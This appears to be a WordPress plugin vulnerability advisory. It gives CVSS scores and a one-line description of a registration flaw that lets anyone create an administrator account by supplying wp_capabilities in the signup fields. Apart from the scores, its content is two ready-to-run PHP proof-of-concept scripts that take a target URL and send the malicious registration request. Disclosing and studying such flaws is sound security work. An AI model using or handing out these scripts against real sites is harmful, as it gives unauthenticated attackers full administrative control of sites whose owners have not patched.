9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
The user registration functionality of the plugin allowed arbitrary user meta to be supplied, including wp_capabilities, during registration which made it possible for users to register as an administrator.
<?php
// Settings
$wp_url = $argv[1];
// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'reg_username' => 'Hax0r',
'reg_email' => '[email protected]',
'reg_password' => 'password',
'reg_password_present' => 'true',
'reg_first_name' => 'Hax0r',
'reg_last_name' => 'Hax0r',
'wp_capabilities[administrator]' => '1',
'action' => 'pp_ajax_signup',
'melange_id' => ''
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
or
<?php
// Settings
$wp_url = $argv[1];
// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'reg_username' => 'Hax0r',
'reg_email' => '[email protected]',
'reg_password' => 'password',
'reg_password_present' => 'true',
'reg_first_name' => 'Hax0r',
'reg_last_name' => 'Hax0r',
'wp_capabilities[administrator]' => '1',
'reg_submit' => '1',
'melange_id' => ''
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P